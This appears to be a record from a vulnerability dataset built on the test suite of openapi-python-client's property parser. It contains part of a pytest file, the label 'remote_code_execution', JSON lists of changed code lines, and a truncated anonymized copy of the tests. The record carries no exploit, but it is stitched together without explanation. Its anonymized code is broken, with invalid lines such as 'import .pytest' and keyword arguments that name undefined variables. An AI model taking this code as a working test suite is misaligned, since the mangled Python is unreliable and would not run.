assert ref_property.get_type_string() == "MyRefClass"
ref_property.required = False
assert ref_property.get_type_string() == "Optional[MyRefClass]"
def test_get_imports(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyRefClass", module_name="my_test_enum")
prefix = mocker.MagicMock()
from openapi_python_client.parser.properties import RefProperty
p = RefProperty(name="test", required=True, default=None, reference=fake_reference)
assert p.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Dict",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
f"from {prefix}.{fake_reference.module_name} import {fake_reference.class_name}",
"from typing import Dict",
"from typing import cast",
"from typing import Optional",
}
def test__validate_default(self, mocker):
from openapi_python_client.parser.properties import RefProperty
with pytest.raises(ValidationError):
p = RefProperty(name="a name", required=True, default="", reference=mocker.MagicMock())
enum_property = mocker.MagicMock()
enum_property._validate_default.return_value = "val1"
mocker.patch(f"{MODULE_NAME}.EnumProperty.get_enum", return_value=enum_property)
p = RefProperty(name="a name", required=True, default="", reference=mocker.MagicMock())
assert p.default == "val1"
class TestDictProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DictProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
prefix = mocker.MagicMock()
p = DictProperty(name=name, required=True, default=None)
assert p.get_imports(prefix=prefix) == {
"from typing import Dict",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
"from typing import Dict",
}
p.default = mocker.MagicMock()
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
"from typing import Dict",
"from typing import cast",
"from dataclasses import field",
}
def test__validate_default(self):
from openapi_python_client.parser.properties import DictProperty
p = DictProperty(name="a name", required=True, default={"key": "value"})
with pytest.raises(ValidationError):
p = DictProperty(name="a name", required=True, default="not a dict")
class TestPropertyFromData:
def test_property_from_data_enum(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = mocker.MagicMock(title=None)
EnumProperty = mocker.patch(f"{MODULE_NAME}.EnumProperty")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
EnumProperty.values_from_list.assert_called_once_with(data.enum)
EnumProperty.assert_called_once_with(
name=name, required=required, values=EnumProperty.values_from_list(), default=data.default, title=name
)
assert p == EnumProperty()
EnumProperty.reset_mock()
data.title = mocker.MagicMock()
property_from_data(
name=name, required=required, data=data,
)
EnumProperty.assert_called_once_with(
name=name, required=required, values=EnumProperty.values_from_list(), default=data.default, title=data.title
)
def test_property_from_data_ref(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Reference.construct(ref=mocker.MagicMock())
from_ref = mocker.patch(f"{MODULE_NAME}.Reference.from_ref")
RefProperty = mocker.patch(f"{MODULE_NAME}.RefProperty")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
from_ref.assert_called_once_with(data.ref)
RefProperty.assert_called_once_with(name=name, required=required, reference=from_ref(), default=None)
assert p == RefProperty()
def test_property_from_data_string(self, mocker):
_string_based_property = mocker.patch(f"{MODULE_NAME}._string_based_property")
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type="string")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == _string_based_property.return_value
_string_based_property.assert_called_once_with(name=name, required=required, data=data)
@pytest.mark.parametrize(
"openapi_type,python_type",
[
("number", "FloatProperty"),
("integer", "IntProperty"),
("boolean", "BooleanProperty"),
("object", "DictProperty"),
],
)
def test_property_from_data_simple_types(self, mocker, openapi_type, python_type):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type=openapi_type)
clazz = mocker.patch(f"{MODULE_NAME}.{python_type}")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
clazz.assert_called_once_with(name=name, required=required, default=None)
assert p == clazz()
# Test optional values
clazz.reset_mock()
data.default = mocker.MagicMock()
property_from_data(
name=name, required=required, data=data,
)
clazz.assert_called_once_with(name=name, required=required, default=data.default)
def test_property_from_data_array(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array", items={"type": "number", "default": "0.0"},)
ListProperty = mocker.patch(f"{MODULE_NAME}.ListProperty")
FloatProperty = mocker.patch(f"{MODULE_NAME}.FloatProperty")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
FloatProperty.assert_called_once_with(name=name, required=True, default="0.0")
ListProperty.assert_called_once_with(
name=name, required=required, default=None, inner_property=FloatProperty.return_value
)
assert p == ListProperty.return_value
def test_property_from_data_array_no_items(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array")
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(data=data, detail="type array must have items defined")
def test_property_from_data_array_invalid_items(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(type="array", items={},)
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(data=oai.Schema(), detail=f"invalid data in items of array {name}")
def test_property_from_data_union(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(anyOf=[{"type": "number", "default": "0.0"}, {"type": "integer", "default": "0"},])
UnionProperty = mocker.patch(f"{MODULE_NAME}.UnionProperty")
FloatProperty = mocker.patch(f"{MODULE_NAME}.FloatProperty")
IntProperty = mocker.patch(f"{MODULE_NAME}.IntProperty")
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
FloatProperty.assert_called_once_with(name=name, required=required, default="0.0")
IntProperty.assert_called_once_with(name=name, required=required, default="0")
UnionProperty.assert_called_once_with(
name=name,
required=required,
default=None,
inner_properties=[FloatProperty.return_value, IntProperty.return_value],
)
assert p == UnionProperty.return_value
def test_property_from_data_union_bad_type(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema(anyOf=[{}])
mocker.patch("openapi_python_client.utils.remove_string_escapes", return_value=name)
from openapi_python_client.parser.properties import property_from_data
p = property_from_data(name=name, required=required, data=data)
assert p == PropertyError(detail=f"Invalid property in union {name}", data=oai.Schema())
def test_property_from_data_unsupported_type(self, mocker):
name = mocker.MagicMock()
required = mocker.MagicMock()
data = oai.Schema.construct(type=mocker.MagicMock())
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import property_from_data
assert property_from_data(name=name, required=required, data=data) == PropertyError(
data=data, detail=f"unknown type {data.type}"
)
def test_property_from_data_no_valid_props_in_data(self):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import property_from_data
data = oai.Schema()
assert property_from_data(name="blah", required=True, data=data) == PropertyError(
data=data, detail="Schemas must either have one of enum, anyOf, or type defined."
)
def test_property_from_data_validation_error(self, mocker):
from openapi_python_client.parser.errors import PropertyError
from openapi_python_client.parser.properties import property_from_data
mocker.patch(f"{MODULE_NAME}._property_from_data").side_effect = ValidationError()
data = oai.Schema()
assert property_from_data(name="blah", required=True, data=data) == PropertyError(
detail="Failed to validate default value", data=data
)
class TestStringBasedProperty:
    """Tests for _string_based_property's dispatch on the schema's string format."""

    def test__string_based_property_no_format(self, mocker):
        """A plain string (no format) should become a StringProperty."""
        from openapi_python_client.parser.properties import _string_based_property

        name = mocker.MagicMock()
        required = mocker.MagicMock()
        data = oai.Schema.construct(type="string")
        StringProperty = mocker.patch(f"{MODULE_NAME}.StringProperty")

        prop = _string_based_property(name=name, required=required, data=data)

        StringProperty.assert_called_once_with(name=name, required=required, pattern=None, default=None)
        assert prop == StringProperty.return_value

        # default and pattern from the schema should be forwarded when present.
        StringProperty.reset_mock()
        data.default = mocker.MagicMock()
        data.pattern = mocker.MagicMock()
        _string_based_property(name=name, required=required, data=data)
        StringProperty.assert_called_once_with(name=name, required=required, pattern=data.pattern, default=data.default)

    def test__string_based_property_datetime_format(self, mocker):
        """format=date-time should become a DateTimeProperty."""
        from openapi_python_client.parser.properties import _string_based_property

        name = mocker.MagicMock()
        required = mocker.MagicMock()
        data = oai.Schema.construct(type="string", schema_format="date-time")
        DateTimeProperty = mocker.patch(f"{MODULE_NAME}.DateTimeProperty")

        prop = _string_based_property(name=name, required=required, data=data)

        DateTimeProperty.assert_called_once_with(name=name, required=required, default=None)
        assert prop == DateTimeProperty.return_value

        # A schema default should be forwarded to the property.
        DateTimeProperty.reset_mock()
        data.default = mocker.MagicMock()
        _string_based_property(name=name, required=required, data=data)
        DateTimeProperty.assert_called_once_with(name=name, required=required, default=data.default)

    def test__string_based_property_date_format(self, mocker):
        """format=date should become a DateProperty."""
        from openapi_python_client.parser.properties import _string_based_property

        name = mocker.MagicMock()
        required = mocker.MagicMock()
        data = oai.Schema.construct(type="string", schema_format="date")
        DateProperty = mocker.patch(f"{MODULE_NAME}.DateProperty")

        prop = _string_based_property(name=name, required=required, data=data)

        DateProperty.assert_called_once_with(name=name, required=required, default=None)
        assert prop == DateProperty.return_value

        # A schema default should be forwarded to the property.
        DateProperty.reset_mock()
        data.default = mocker.MagicMock()
        _string_based_property(name=name, required=required, data=data)
        DateProperty.assert_called_once_with(name=name, required=required, default=data.default)

    def test__string_based_property_binary_format(self, mocker):
        """format=binary should become a FileProperty."""
        from openapi_python_client.parser.properties import _string_based_property

        name = mocker.MagicMock()
        required = mocker.MagicMock()
        data = oai.Schema.construct(type="string", schema_format="binary")
        FileProperty = mocker.patch(f"{MODULE_NAME}.FileProperty")

        prop = _string_based_property(name=name, required=required, data=data)

        FileProperty.assert_called_once_with(name=name, required=required, default=None)
        assert prop == FileProperty.return_value

        # A schema default should be forwarded to the property.
        FileProperty.reset_mock()
        data.default = mocker.MagicMock()
        _string_based_property(name=name, required=required, data=data)
        FileProperty.assert_called_once_with(name=name, required=required, default=data.default)

    def test__string_based_property_unsupported_format(self, mocker):
        """An unrecognized format should fall back to StringProperty."""
        from openapi_python_client.parser.properties import _string_based_property

        name = mocker.MagicMock()
        required = mocker.MagicMock()
        data = oai.Schema.construct(type="string", schema_format=mocker.MagicMock())
        StringProperty = mocker.patch(f"{MODULE_NAME}.StringProperty")

        prop = _string_based_property(name=name, required=required, data=data)

        StringProperty.assert_called_once_with(name=name, required=required, pattern=None, default=None)
        assert prop == StringProperty.return_value

        # default and pattern from the schema should be forwarded when present.
        StringProperty.reset_mock()
        data.default = mocker.MagicMock()
        data.pattern = mocker.MagicMock()
        _string_based_property(name=name, required=required, data=data)
        StringProperty.assert_called_once_with(name=name, required=required, pattern=data.pattern, default=data.default)
| remote_code_execution | {
"code": [
"from openapi_python_client.parser.errors import PropertyError",
"class TestStringProperty:",
" def test___post_init__(self):",
" from openapi_python_client.parser.properties import StringProperty",
" sp = StringProperty(name=\"test\", required=True, default=\"A Default Value\",)",
" assert sp.default == '\"A Default Value\"'",
" \"from datetime import datetime\",",
" \"from datetime import datetime\",",
" \"from datetime import date\",",
" \"from datetime import date\",",
"class TestDictProperty:",
" def test___post_init__(self):",
" from openapi_python_client.parser.properties import DictProperty",
" p = DictProperty(name=\"blah\", required=True, default={})",
" assert p.default == \"field(default_factory=lambda: cast(Dict[Any, Any], {}))\"",
" FloatProperty.assert_called_once_with(name=f\"{name}_item\", required=True, default=\"0.0\")"
],
"line_no": [
4,
47,
48,
49,
51,
53,
73,
80,
93,
100,
380,
381,
382,
384,
385,
509
]
} | {
"code": [
"from datetime import date, datetime",
"from openapi_python_client.parser.errors import PropertyError, ValidationError",
" def test___post_init(self, mocker):",
" from openapi_python_client.parser.properties import Property",
" validate_default = mocker.patch(f\"{MODULE_NAME}.Property._validate_default\")",
" Property(name=\"a name\", required=True, default=None)",
" Property(name=\"a name\", required=True, default=\"the default value\")",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import Property",
" with pytest.raises(ValidationError):",
" p._validate_default(\"a default value\")",
" with pytest.raises(ValidationError):",
" p = Property(name=\"a name\", required=True, default=\"\")",
"class TestStringProperty:",
" from openapi_python_client.parser.properties import StringProperty",
" p = StringProperty(name=\"a name\", required=True, default=\"the default value\")",
" assert p.default == '\"the default value\"'",
" \"import datetime\",",
" \"import datetime\",",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import DateTimeProperty",
" with pytest.raises(ValidationError):",
" p = DateTimeProperty(name=\"a name\", required=True, default=\"not a datetime\")",
" p = DateTimeProperty(name=\"a name\", required=True, default=\"2017-07-21T17:32:28Z\")",
" assert p.default == \"datetime.datetime(2017, 7, 21, 17, 32, 28, tzinfo=datetime.timezone.utc)\"",
" \"import datetime\",",
" \"import datetime\",",
" from openapi_python_client.parser.properties import DateProperty",
" p = DateProperty(name=\"a name\", required=True, default=\"not a date\")",
" p = DateProperty(name=\"a name\", required=True, default=\"1010-10-10\")",
" assert p.default == \"datetime.date(1010, 10, 10)\"",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import FileProperty",
" p = FileProperty(name=\"a name\", required=True, default=None)",
" with pytest.raises(ValidationError):",
"class TestFloatProperty:",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import FloatProperty",
" p = FloatProperty(name=\"a name\", required=True, default=\"123.123\")",
" assert p.default == 123.123",
" with pytest.raises(ValidationError):",
" p = FloatProperty(name=\"a name\", required=True, default=\"not a float\")",
"class TestIntProperty:",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import IntProperty",
" p = IntProperty(name=\"a name\", required=True, default=None)",
" p = IntProperty(name=\"a name\", required=True, default=\"123\")",
" assert p.default == 123",
" with pytest.raises(ValidationError):",
" p = IntProperty(name=\"a name\", required=True, default=\"not an int\")",
"class TestBooleanProperty:",
" def test__validate_default(self):",
" from openapi_python_client.parser.properties import BooleanProperty",
" p = BooleanProperty(name=\"a name\", required=True, default=None)",
" p = BooleanProperty(name=\"a name\", required=True, default=\"Literally anything will work\")",
" def test__validate_default(self, mocker):",
" inner_property = mocker.MagicMock()",
" inner_type_string = mocker.MagicMock()",
" inner_property._validate_default.return_value = \"y\"",
" p = ListProperty(name=\"a name\", required=True, default=[\"x\"], inner_property=inner_property)",
" with pytest.raises(ValidationError):",
" p = ListProperty(name=\"a name\", required=True, default=\"x\", inner_property=inner_property)",
" from openapi_python_client.parser.properties import ListProperty, RefProperty",
" inner_enum_property = mocker.MagicMock(spec=RefProperty)",
" inner_enum_property.get_type_string.return_value = \"AnEnum\"",
" p = ListProperty(name=\"a name\", required=True, default=[\"val1\"], inner_property=inner_enum_property)",
" assert p.default == f\"field(default_factory=lambda: cast(List[AnEnum], [AnEnum.val1]))\"",
" def test__validate_default(self, mocker):",
" from openapi_python_client.parser.properties import UnionProperty",
" inner_property_1.get_type_string.return_value = \"inner_type_string_1\"",
" inner_property_1._validate_default.side_effect = ValidationError()",
" inner_property_2 = mocker.MagicMock()",
" inner_property_2._validate_default.return_value = \"the default value\"",
" p = UnionProperty(",
" name=\"test\", required=True, default=\"a value\", inner_properties=[inner_property_1, inner_property_2]",
" assert p.default == \"the default value\"",
" with pytest.raises(ValidationError):",
" p = UnionProperty(",
" name=\"test\", required=True, default=\"a value\", inner_properties=[inner_property_1, inner_property_2]",
" def test__validate_default(self, mocker):",
" fake_reference = mocker.MagicMock(class_name=\"MyTestEnum\", module_name=\"my_test_enum\")",
" mocker.patch(f\"{MODULE_NAME}.Reference.from_ref\", return_value=fake_reference)",
" from openapi_python_client.parser import properties",
" enum_property = properties.EnumProperty(",
" name=\"test\", required=True, default=\"test\", values={\"TEST\": \"test\"}, title=\"a_title\"",
" )",
" assert enum_property.default == \"MyTestEnum.TEST\"",
" with pytest.raises(ValidationError):",
" enum_property = properties.EnumProperty(",
" name=\"test\", required=True, default=\"bad_val\", values={\"TEST\": \"test\"}, title=\"a_title\"",
" properties._existing_enums = {}",
" from openapi_python_client.parser.properties import RefProperty",
" with pytest.raises(ValidationError):",
" p = RefProperty(name=\"a name\", required=True, default=\"\", reference=mocker.MagicMock())",
" enum_property = mocker.MagicMock()",
" enum_property._validate_default.return_value = \"val1\"",
" mocker.patch(f\"{MODULE_NAME}.EnumProperty.get_enum\", return_value=enum_property)",
" p = RefProperty(name=\"a name\", required=True, default=\"\", reference=mocker.MagicMock())",
"class TestDictProperty:",
" def test__validate_default(self):",
" p = DictProperty(name=\"a name\", required=True, default={\"key\": \"value\"})",
" with pytest.raises(ValidationError):",
" p = DictProperty(name=\"a name\", required=True, default=\"not a dict\")",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" FloatProperty.assert_called_once_with(name=name, required=True, default=\"0.0\")",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" mocker.patch(\"openapi_python_client.utils.remove_string_escapes\", return_value=name)",
" def test_property_from_data_validation_error(self, mocker):",
" from openapi_python_client.parser.errors import PropertyError",
" from openapi_python_client.parser.properties import property_from_data",
" mocker.patch(f\"{MODULE_NAME}._property_from_data\").side_effect = ValidationError()",
" data = oai.Schema()",
" assert property_from_data(name=\"blah\", required=True, data=data) == PropertyError(",
" detail=\"Failed to validate default value\", data=data",
" )"
],
"line_no": [
1,
6,
13,
14,
16,
18,
21,
60,
61,
66,
67,
69,
70,
73,
84,
86,
87,
98,
105,
109,
110,
112,
113,
115,
116,
127,
134,
139,
142,
144,
145,
165,
166,
169,
171,
175,
176,
177,
182,
183,
185,
186,
189,
190,
191,
194,
196,
197,
199,
200,
203,
204,
205,
208,
210,
259,
262,
263,
265,
267,
270,
271,
274,
276,
277,
280,
281,
327,
328,
331,
332,
333,
335,
336,
337,
340,
344,
345,
346,
467,
468,
469,
471,
473,
474,
475,
476,
478,
479,
480,
483,
535,
537,
538,
540,
541,
542,
543,
547,
573,
576,
578,
579,
588,
616,
631,
654,
678,
684,
705,
720,
740,
769,
770,
771,
773,
775,
776,
777,
778
]
} | import .pytest
import openapi_python_client.schema as oai
from openapi_python_client.parser.errors import PropertyError
VAR_0 = "openapi_python_client.parser.properties"
class CLASS_0:
def FUNC_0(self):
from openapi_python_client.parser.properties import Property
VAR_4 = Property(VAR_5="test", VAR_26=True, default=None)
VAR_4._type_string = "TestType"
assert VAR_4.get_type_string() == "TestType"
VAR_4.required = False
assert VAR_4.get_type_string() == "Optional[TestType]"
def FUNC_1(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_5 = VAR_1.MagicMock()
VAR_6 = VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_4 = Property(VAR_5=name, VAR_26=True, default=None)
VAR_7 = VAR_1.patch.object(VAR_4, "get_type_string")
assert VAR_4.to_string() == f"{VAR_6(VAR_5)}: {VAR_7()}"
VAR_4.required = False
assert VAR_4.to_string() == f"{VAR_6(VAR_5)}: {VAR_7()} = None"
VAR_4.default = "TEST"
assert VAR_4.to_string() == f"{VAR_6(VAR_5)}: {VAR_7()} = TEST"
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import Property
VAR_5 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_4 = Property(VAR_5=name, VAR_26=True, default=None)
assert VAR_4.get_imports(VAR_9="") == set()
VAR_4.required = False
assert VAR_4.get_imports(VAR_9="") == {"from typing import Optional"}
class CLASS_1:
def test___post_init__(self):
from openapi_python_client.parser.properties import .StringProperty
VAR_8 = VAR_35(VAR_5="test", VAR_26=True, default="A Default Value",)
assert VAR_8.default == '"A Default Value"'
def FUNC_0(self):
from openapi_python_client.parser.properties import .StringProperty
VAR_4 = VAR_35(VAR_5="test", VAR_26=True, default=None)
assert VAR_4.get_type_string() == "str"
VAR_4.required = False
assert VAR_4.get_type_string() == "Optional[str]"
class CLASS_2:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import .DateTimeProperty
VAR_5 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_4 = VAR_36(VAR_5=name, VAR_26=True, default=None)
assert VAR_4.get_imports(VAR_9="") == {
"from datetime import datetime",
"from typing import cast",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9="") == {
"from typing import Optional",
"from datetime import datetime",
"from typing import cast",
}
class CLASS_3:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import .DateProperty
VAR_5 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_4 = VAR_37(VAR_5=name, VAR_26=True, default=None)
assert VAR_4.get_imports(VAR_9="") == {
"from datetime import date",
"from typing import cast",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9="") == {
"from typing import Optional",
"from datetime import date",
"from typing import cast",
}
class CLASS_4:
def FUNC_2(self, VAR_1):
from openapi_python_client.parser.properties import .FileProperty
VAR_5 = VAR_1.MagicMock()
VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_9 = "blah"
VAR_4 = VAR_38(VAR_5=name, VAR_26=True, default=None)
assert VAR_4.get_imports(VAR_9=prefix) == {f"from {VAR_9}.types import File", "from dataclasses import astuple"}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9=prefix) == {
"from typing import Optional",
f"from {VAR_9}.types import File",
"from dataclasses import astuple",
}
class CLASS_5:
def FUNC_0(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty
VAR_10 = VAR_1.MagicMock()
VAR_11 = VAR_1.MagicMock()
VAR_10.get_type_string.return_value = VAR_11
VAR_4 = VAR_31(VAR_5="test", VAR_26=True, default=None, VAR_10=inner_property)
assert VAR_4.get_type_string() == f"List[{VAR_11}]"
VAR_4.required = False
assert VAR_4.get_type_string() == f"Optional[List[{VAR_11}]]"
VAR_4 = VAR_31(VAR_5="test", VAR_26=True, default=[], VAR_10=inner_property)
assert VAR_4.default == f"field(default_factory=lambda: cast(List[{VAR_11}], []))"
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import .ListProperty
VAR_10 = VAR_1.MagicMock()
VAR_12 = VAR_1.MagicMock()
VAR_10.get_imports.return_value = {VAR_12}
VAR_9 = VAR_1.MagicMock()
VAR_4 = VAR_31(VAR_5="test", VAR_26=True, default=None, VAR_10=inner_property)
assert VAR_4.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import List",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import List",
"from typing import Optional",
}
VAR_4.default = VAR_1.MagicMock()
assert VAR_4.get_imports(VAR_9=prefix) == {
VAR_12,
"from typing import Optional",
"from typing import List",
"from typing import cast",
"from dataclasses import field",
}
class CLASS_6:
def FUNC_0(self, VAR_1):
from openapi_python_client.parser.properties import .UnionProperty
VAR_13 = VAR_1.MagicMock()
VAR_13.get_type_string.return_value = "inner_type_string_1"
VAR_14 = VAR_1.MagicMock()
VAR_14.get_type_string.return_value = "inner_type_string_2"
VAR_4 = VAR_33(
VAR_5="test", VAR_26=True, default=None, inner_properties=[VAR_13, VAR_14]
)
assert VAR_4.get_type_string() == "Union[inner_type_string_1, inner_type_string_2]"
VAR_4.required = False
assert VAR_4.get_type_string() == "Optional[Union[inner_type_string_1, inner_type_string_2]]"
def FUNC_3(self, VAR_1):
from openapi_python_client.parser.properties import .UnionProperty
VAR_13 = VAR_1.MagicMock()
VAR_15 = VAR_1.MagicMock()
VAR_13.get_imports.return_value = {VAR_15}
VAR_14 = VAR_1.MagicMock()
VAR_16 = VAR_1.MagicMock()
VAR_14.get_imports.return_value = {VAR_16}
VAR_9 = VAR_1.MagicMock()
VAR_4 = VAR_33(
VAR_5="test", VAR_26=True, default=None, inner_properties=[VAR_13, VAR_14]
)
assert VAR_4.get_imports(VAR_9=prefix) == {
VAR_15,
VAR_16,
"from typing import Union",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9=prefix) == {
VAR_15,
VAR_16,
"from typing import Union",
"from typing import Optional",
}
class CLASS_7:
def test___post_init__(self, VAR_1):
VAR_5 = VAR_1.MagicMock()
VAR_6 = VAR_1.patch("openapi_python_client.utils.snake_case")
VAR_17 = VAR_1.MagicMock(class_name="MyTestEnum")
VAR_18 = VAR_1.MagicMock(class_name="Deduped")
VAR_19 = VAR_1.patch(
f"{VAR_0}.Reference.from_ref", side_effect=[VAR_17, VAR_18, deduped_reference]
)
from openapi_python_client.parser import .properties
VAR_20 = VAR_1.MagicMock()
properties._existing_enums = {"MyTestEnum": VAR_20}
VAR_21 = {"FIRST": "first", "SECOND": "second"}
VAR_22 = properties.EnumProperty(
VAR_5=name, VAR_26=True, default="second", VAR_21=values, title="a_title",
)
assert VAR_22.default == "Deduped.SECOND"
assert VAR_22.python_name == VAR_6(VAR_5)
VAR_19.assert_has_calls([VAR_1.call("a_title"), VAR_1.call("MyTestEnum1")])
assert VAR_22.reference == VAR_18
assert properties._existing_enums == {"MyTestEnum": VAR_20, "Deduped": VAR_22}
assert (
properties.EnumProperty(VAR_5=name, VAR_26=True, default="second", VAR_21=values, title="a_title",)
== VAR_22
)
assert properties._existing_enums == {"MyTestEnum": VAR_20, "Deduped": VAR_22}
VAR_20.values = VAR_21
VAR_19.reset_mock()
VAR_19.side_effect = [VAR_17]
VAR_22 = properties.EnumProperty(
VAR_5=name, VAR_26=True, default="second", VAR_21=values, title="a_title",
)
assert VAR_22.default == "MyTestEnum.SECOND"
assert VAR_22.python_name == VAR_6(VAR_5)
VAR_19.assert_called_once_with("a_title")
assert VAR_22.reference == VAR_17
assert len(properties._existing_enums) == 2
properties._existing_enums = {}
def FUNC_0(self, VAR_1):
VAR_17 = VAR_1.MagicMock(class_name="MyTestEnum")
VAR_1.patch(f"{VAR_0}.Reference.from_ref", return_value=VAR_17)
from openapi_python_client.parser import .properties
VAR_22 = properties.EnumProperty(VAR_5="test", VAR_26=True, default=None, VAR_21={}, title="a_title")
assert VAR_22.get_type_string() == "MyTestEnum"
VAR_22.required = False
assert VAR_22.get_type_string() == "Optional[MyTestEnum]"
properties._existing_enums = {}
def FUNC_2(self, VAR_1):
VAR_17 = VAR_1.MagicMock(class_name="MyTestEnum", module_name="my_test_enum")
VAR_1.patch(f"{VAR_0}.Reference.from_ref", return_value=VAR_17)
VAR_9 = VAR_1.MagicMock()
from openapi_python_client.parser import .properties
VAR_22 = properties.EnumProperty(VAR_5="test", VAR_26=True, default=None, VAR_21={}, title="a_title")
assert VAR_22.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_17.module_name} import {VAR_17.class_name}"
}
VAR_22.required = False
assert VAR_22.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_17.module_name} import {VAR_17.class_name}",
"from typing import Optional",
}
properties._existing_enums = {}
def FUNC_4(self):
from openapi_python_client.parser.properties import .EnumProperty
VAR_23 = ["abc", "123", "a23", "1bc"]
VAR_24 = VAR_27.values_from_list(VAR_23)
assert VAR_24 == {
"ABC": "abc",
"VALUE_1": "123",
"A23": "a23",
"VALUE_3": "1bc",
}
def FUNC_5(self):
from openapi_python_client.parser.properties import .EnumProperty
VAR_23 = ["abc", "123", "a23", "abc"]
with pytest.raises(ValueError):
VAR_27.values_from_list(VAR_23)
def FUNC_6(self, VAR_1):
from openapi_python_client.parser import .properties
properties._existing_enums = VAR_1.MagicMock()
assert properties.EnumProperty.get_all_enums() == properties._existing_enums
properties._existing_enums = {}
def FUNC_7(self):
from openapi_python_client.parser import .properties
properties._existing_enums = {"test": "an enum"}
assert properties.EnumProperty.get_enum("test") == "an enum"
properties._existing_enums = {}
class CLASS_8:
def FUNC_8(self, VAR_1):
from openapi_python_client.parser.properties import .RefProperty
VAR_25 = VAR_28(
VAR_5="test", VAR_26=True, default=None, reference=VAR_1.MagicMock(class_name="MyRefClass")
)
assert VAR_25.template == "ref_property.pyi"
VAR_1.patch(f"{VAR_0}.EnumProperty.get_enum", return_value="an enum")
assert VAR_25.template == "enum_property.pyi"
def FUNC_0(self, VAR_1):
from openapi_python_client.parser.properties import .RefProperty
VAR_25 = VAR_28(
VAR_5="test", VAR_26=True, default=None, reference=VAR_1.MagicMock(class_name="MyRefClass")
)
assert VAR_25.get_type_string() == "MyRefClass"
VAR_25.required = False
assert VAR_25.get_type_string() == "Optional[MyRefClass]"
def FUNC_2(self, VAR_1):
VAR_17 = VAR_1.MagicMock(class_name="MyRefClass", module_name="my_test_enum")
VAR_9 = VAR_1.MagicMock()
from openapi_python_client.parser.properties import .RefProperty
VAR_4 = VAR_28(VAR_5="test", VAR_26=True, default=None, reference=VAR_17)
assert VAR_4.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_17.module_name} import {VAR_17.class_name}",
"from typing import Dict",
"from typing import cast",
}
VAR_4.required = False
assert VAR_4.get_imports(VAR_9=prefix) == {
f"from {VAR_9}.{VAR_17.module_name} import {VAR_17.class_name}",
"from typing import Dict",
"from typing import cast",
"from typing import Optional",
}
class CLASS_9:
def test___post_init__(self):
from openapi_python_client.parser.properties import DictProperty
